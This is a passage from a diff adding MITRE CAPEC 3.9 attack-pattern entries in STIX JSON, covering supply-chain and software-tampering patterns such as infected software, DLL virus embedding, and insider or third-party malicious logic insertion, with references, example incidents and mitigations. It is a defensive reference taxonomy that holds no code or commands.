], + "x_capec_prerequisites": [ + "Access to the component currently deployed at a victim location." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary adds malicious logic, often in the form of a computer virus, to otherwise benign software. This logic is often hidden from the user of the software and works behind the scenes to achieve negative impacts. Many times, the malicious logic is inserted into empty space between legitimate code, and is then called when the software is executed. This pattern of attack focuses on software already fielded and used in operation as opposed to software that is still under development and part of the supply chain.", + "external_references": [ + { + "external_id": "CAPEC-442", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/442.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Marshall Brain, How Computer Viruses Work, 2007, MindPride", + "external_id": "REF-387", + "source_name": "reference_from_CAPEC", + "url": "http://www.mindpride.net/root/Extras/how-stuff-works/how_computer_viruses_work.htm" + } + ], + "id": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Infected Software", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--13b94aaa-9c95-487c-ad68-8c29d8ac0068" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c" + ], + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage anti-virus products to detect and quarantine software with known virus.", + "id": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-442-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ff60912c-64b2-4d71-8e26-1ddcf4130fd3", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses their privileged position within an authorized development organization to inject malicious logic into a codebase or product.", + "external_references": [ + { + "external_id": "CAPEC-443", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/443.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Ax Sharma, Dev corrupts NPM libs 'colors' and 'faker' breaking thousands of apps, 2022--01---09, BleepingComputer", + "external_id": "REF-704", + "source_name": "reference_from_CAPEC", + "url": "https://www.bleepingcomputer.com/news/security/dev-corrupts-npm-libs-colors-and-faker-breaking-thousands-of-apps/" + }, + { + "description": "Alberto Pellitteri, Malicious modifications to open source projects affecting thousands, 2022--01---12, SysDig", + "external_id": "REF-705", + "source_name": "reference_from_CAPEC", + "url": "https://sysdig.com/blog/malicious-modifications-detection-sysdig/" + } + ], + "id": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Inserted Into Product by Authorized Developer", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In January 2022 the author of popular JavaScript packages \"Faker\" and \"colors\", used for generating mock data and including colored text within NodeJS consoles respectively, introduced malicious code that resulted in a Denial of Service (DoS) via an infinite loop. When applications that leveraged these packages updated to the malicious version, their applications executed the infinite loop and output gibberish ASCI characters endlessly. This resulted in the application being unusable until a stable version of the package was obtained. [REF-705]\n ", + "During initial development, an authorized hardware developer implants a malicious microcontroller within an Internet of Things (IOT) device and programs the microcontroller to communicate with the vulnerable device. Each time the device initializes, the malicious microcontroller's code is executed, which ultimately provides the adversary with backdoor access to the vulnerable device. This can further allow the adversary to sniff network traffic, exfiltrate date, execute unauthorized commands, and/or pivot to other vulnerable devices." + ], + "x_capec_extended_description": "\n Supply chain attacks from approved or trusted developers are extremely difficult to detect as it is generally assumed the quality control and internal security measures of these organizations conform to best practices. In some cases the malicious logic is intentional, embedded by a disgruntled employee, programmer, or individual with an otherwise hidden agenda. In other cases, the integrity of the product is compromised by accident (e.g. by lapse in the internal security of the organization that results in a product becoming contaminated). In further cases, the developer embeds a backdoor into a product to serve some purpose, such as product support, but discovery of the backdoor results in its malicious use by adversaries. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and hardware during development and prior to deployment to ensure that it functions as intended and without any malicious functionality. This includes both initial development, as well as updates propagated to the product after deployment.", + "id": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-443-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d53570d3-7395-4034-b882-85443c4d930f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a", + "target_ref": "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies a technology, product, or component during its development to acheive a negative impact once the system is deployed. The goal of the adversary is to modify the system in such a way that the negative impact can be leveraged when the system is later deployed. Development alteration attacks may include attacks that insert malicious logic into the system's software, modify or replace hardware components, and other attacks which negatively impact the system during development. These attacks generally require insider access to modify source code or to tamper with hardware components. The product is then delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-444", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/444.html" + } + ], + "id": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Development Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--3c71639a-ebbd-43a4-8d0d-8a0e4cf9ade3", + "attack-pattern--42fc0c14-a6f7-4839-978f-d1553f68f750", + "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "attack-pattern--5f69cd20-0000-4733-85d5-9bb2fdcaeb36", + "attack-pattern--3129bca1-91e3-4ec0-a117-557c84d2a92c", + "attack-pattern--a2328e82-460e-4de6-a459-7005de7befe4", + "attack-pattern--51d000d6-11a0-461b-98e7-8550beac027b", + "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "attack-pattern--14ed805a-65a4-45c2-8e4e-626f22226465", + "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "attack-pattern--a7061d3b-6f93-440d-8b0d-4078e80eef88", + "attack-pattern--d0a5a641-ba5e-4bd6-8a06-addfa4d03cfb" + ], + "x_capec_prerequisites": [ + "Access to the system during the development phase to alter and/or modify software and hardware components. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software and software components during development and prior to deployment to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-444-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3f05e05a-2eec-4147-a5b0-18b6c29ec5da", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d8829b7c-69b5-4edf-8446-07f8efda3255", + "target_ref": "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary exploits a configuration management system so that malicious logic is inserted into a software products build, update or deployed environment. If an adversary can control the elements included in a product's configuration management for build they can potentially replace, modify or insert code files containing malicious logic. If an adversary can control elements of a product's ongoing operational configuration management baseline they can potentially force clients receiving updates from the system to install insecure software when receiving updates from the server.\n ", + "external_references": [ + { + "external_id": "CAPEC-445", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/445.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Chef Manage deserializes cookie data insecurely, 2016--05---17, Carnegie Mellon University", + "external_id": "REF-706", + "source_name": "reference_from_CAPEC", + "url": "https://www.kb.cert.org/vuls/id/586503" + } + ], + "id": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product Software via Configuration Management Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "\n In 2016, the policy-based configuration management system Chef was shown to be vulnerable to remote code execution attacks based on its Chef Manage add-on improperly deserializing user-driven cookie data. This allowed unauthenticated users the ability to craft cookie data that executed arbitrary code with the web server's privileges. [REF-706]\n " + ], + "x_capec_extended_description": "\n Configuration management servers operate on the basis of a client pool, instructing each client on which software to install. In some cases the configuration management server will automate the software installation process. A malicious insider or an adversary who has compromised the server can alter the software baseline that clients must install, allowing the adversary to compromise a large number of satellite machines using the configuration management system. If an adversary can control elements of a product's configuration management for its deployed environment they can potentially alter fundamental security properties of the system based on assumptions that secure configurations are in place. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the configuration management system during deployment or currently deployed at a victim location. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess software during development and prior to deployment to ensure that it functions as intended and without any malicious functionality.", + "id": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-445-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8b2e787f-2034-4a16-8515-37dddac4930a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aa94cc6d-559e-4d78-ac28-7d751abed25b", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e626d148-d65c-4d3a-b600-e59852d41f84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f021edf5-f2c1-49c5-b1b9-a07bd11d1aec", + "target_ref": "attack-pattern--f7fd56fe-cc88-4200-907a-8ea3b89e1ddb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary conducts supply chain attacks by the inclusion of insecure third-party components into a technology, product, or code-base, possibly packaging a malicious driver or component along with the product before shipping it to the consumer or acquirer.\n ", + "external_references": [ + { + "external_id": "CAPEC-446", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/446.html" + }, + { + "description": "Supply Chain Compromise", + "external_id": "T1195", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195" + }, + { + "description": "Jon Boyens, Angela Smith, Nadya Bartol, Kris Winkler, Alex Holbrook, Matthew Fallon, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (2nd Draft), 2021--10---28, National Institute of Standards and Technology (NIST)", + "external_id": "REF-379", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-161r1-draft2.pdf" + }, + { + "description": "Thomas Brewster, How Lenovo's Superfish 'Malware' Works And What You Can Do To Kill It, 2015--02---19, Forbes", + "external_id": "REF-707", + "source_name": "reference_from_CAPEC", + "url": "https://www.forbes.com/sites/thomasbrewster/2015/02/19/superfish-need-to-know/?sh=991ab8c38776" + }, + { + "description": "Dan Goodin, Lenovo PCs ship with man-in-the-middle adware that breaks HTTPS connections, 2015--02---19, Ars Technica", + "external_id": "REF-708", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2015/02/lenovo-pcs-ship-with-man-in-the-middle-adware-that-breaks-https-connections/" + }, + { + "description": "Rob Graham, Extracting the SuperFish certificate, 2015--02---19, Errata Security", + "external_id": "REF-709", + "source_name": "reference_from_CAPEC", + "url": "https://blog.erratasec.com/2015/02/extracting-superfish-certificate.html#.VOX5Ky57RqE" + }, + { + "description": "Jordan Robertson, Michael Riley, The Big Hack: How China Used a Tiny Chip to Infiltrate U.S. Companies, 2018--10---04, Bloomberg", + "external_id": "REF-713", + "source_name": "reference_from_CAPEC", + "url": "https://www.bloomberg.com/news/features/2018-10-04/the-big-hack-how-china-used-a-tiny-chip-to-infiltrate-america-s-top-companies" + } + ], + "id": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Logic Insertion into Product via Inclusion of Third-Party Component", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n From mid-2014 to early 2015, Lenovo computers were shipped with the Superfish Visual Search software that ultimately functioned as adware on the system. The Visual Search installation included a self-signed root HTTPS certificate that was able to intercept encrypted traffic for any site visited by the user. Of more concern was the fact that the certificate's corresponding private key was the same for every Lenovo machine. Once the private key was discovered [REF-709], an adversary could then conduct an Adversary-in-the-Middle (AitM) attack that would go undetected by machines that had this certificate installed on it. Adversaries could then masquerade as legitimate entities such as financial institutions, popular corporations, or other secure destinations on the Internet. [REF-708]\n ", + "\n In 2018 it was discovered that Chinese spies infiltrated several U.S. government agencies and corporations as far back as 2015 by including a malicious microchip within the motherboard of servers sold by Elemental Technologies to the victims. Although these servers were assembled via a U.S. based company, the motherboards used within the servers were manufactured and maliciously altered via a Chinese subcontractor. Elemental Technologies then sold these malicious servers to various U.S. government agencies, such as the DoD and CIA, and corporations like Amazon and Apple. The malicious microchip provided adversaries with a backdoor into the system, which further allowed them to access any network that contained the exploited systems, to exfiltrate data to be sent to the Chinese government.[REF-713]\n " + ], + "x_capec_extended_description": "\n The result is a window of opportunity for exploiting the product until the insecure component is discovered. This supply chain threat can result in the installation of malicious software or hardware that introduces widespread security vulnerabilities within an organization. Additionally, because software often depends upon a large number of interdependent libraries and components to be present, security holes can be introduced merely by installing Commercial off the Shelf (COTS) or Open Source Software (OSS) software that comes pre-packaged with the components required for it to operate. It is also worth noting that this attack can occur during initial product development or throughout a product's sustainment.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the product during the initial or continuous development. This access is often obtained via insider access to include the third-party component after deployment." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--08eb707e-3b00-4b2a-8cf4-aeab56225d0b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8518d1b7-1b13-4b4b-af0f-f19b9c7f080a", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Don't assume popular third-party components are free from malware or vulnerabilities. For software, assess for malicious functionality via update/commit reviews or automated static/dynamic analysis prior to including the component within the application and deploying in a production environment.", + "id": "course-of-action--f85980bd-a209-4bd2-a8bd-8b3b5480f089", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-446-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7cf60c87-e9bd-44a0-97fd-cffc9e257e67", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f85980bd-a209-4bd2-a8bd-8b3b5480f089", + "target_ref": "attack-pattern--374de530-29f4-4e14-905f-809f8cae631d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary modifies the design of a technology, product, or component to acheive a negative impact once the system is deployed. In this type of attack, the goal of the adversary is to modify the design of the system, prior to development starting, in such a way that the negative impact can be leveraged when the system is later deployed. Design alteration attacks differ from development alteration attacks in that design alteration attacks take place prior to development and which then may or may not be developed by the adverary. Design alteration attacks include modifying system designs to degrade system performance, cause unexpected states or errors, and general design changes that may lead to additional vulnerabilities. These attacks generally require insider access to modify design documents, but they may also be spoofed via web communications. The product is then developed and delivered to the user where the negative impact can be leveraged at a later time.", + "external_references": [ + { + "external_id": "CAPEC-447", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/447.html" + } + ], + "id": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Design Alteration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--1339dbbe-fe41-467a-b43c-7d56d22a9fe4" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Availability": [ + "Unreliable Execution" + ], + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--8e564ade-17a8-471e-8e2a-4dd2d556ecd2", + "attack-pattern--5f0e5e3b-6889-4583-81ec-5afecbd6765e", + "attack-pattern--3c33e08a-3a4e-4e0f-ae80-6399f6272db7", + "attack-pattern--57b78312-1077-4e31-b3a2-5efb96a6c817", + "attack-pattern--5af917a8-becc-41ec-9053-6976a9da5b28", + "attack-pattern--fcd0d50b-dab4-435d-859e-19514b4e646e" + ], + "x_capec_prerequisites": [ + "Access to system design documentation prior to the development phase. This access is often obtained via insider access or by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have.", + "Ability to forge web communications to deliver modified design documentation." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Assess design documentation prior to development to ensure that they function as intended and without any malicious functionality.", + "id": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a78cd3b8-5b83-473a-a2b9-a4f2f8eb4a52", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e68b1c60-e63a-4c2f-bc78-1be3494a0031", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that design documentation is saved in a secure location and has proper access controls set in place to avoid unnecessary modification.", + "id": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-447-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--54127afd-7b03-4cb6-b49b-ae02838e829c", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a24db5bc-0875-48f1-b156-cd237ebeddad", + "target_ref": "attack-pattern--cf550376-63ac-4b46-87d1-0e324c1c1c46", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tampers with a DLL and embeds a computer virus into gaps between legitimate machine instructions. These gaps may be the result of compiler optimizations that pad memory blocks for performance gains. The embedded virus then attempts to infect any machine which interfaces with the product, and possibly steal private data or eavesdrop.", + "external_references": [ + { + "external_id": "CAPEC-448", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/448.html" + }, + { + "external_id": "CWE-506", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/506.html" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + } + ], + "id": "attack-pattern--41a75729-839b-409f-88f6-1b0c0dc9286c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Embed Virus into DLL", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--66112136-aa17-4300-aef8-d7a42ebc6e38" + ], + "x_capec_consequences": { + "Authorization": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Access to the software currently deployed at a victim location. This access is often obtained by leveraging another attack pattern to gain permissions that the adversary wouldn't normally have." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f0abd6ec-3ef1-4bad-88ac-615c6674b4d5", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + 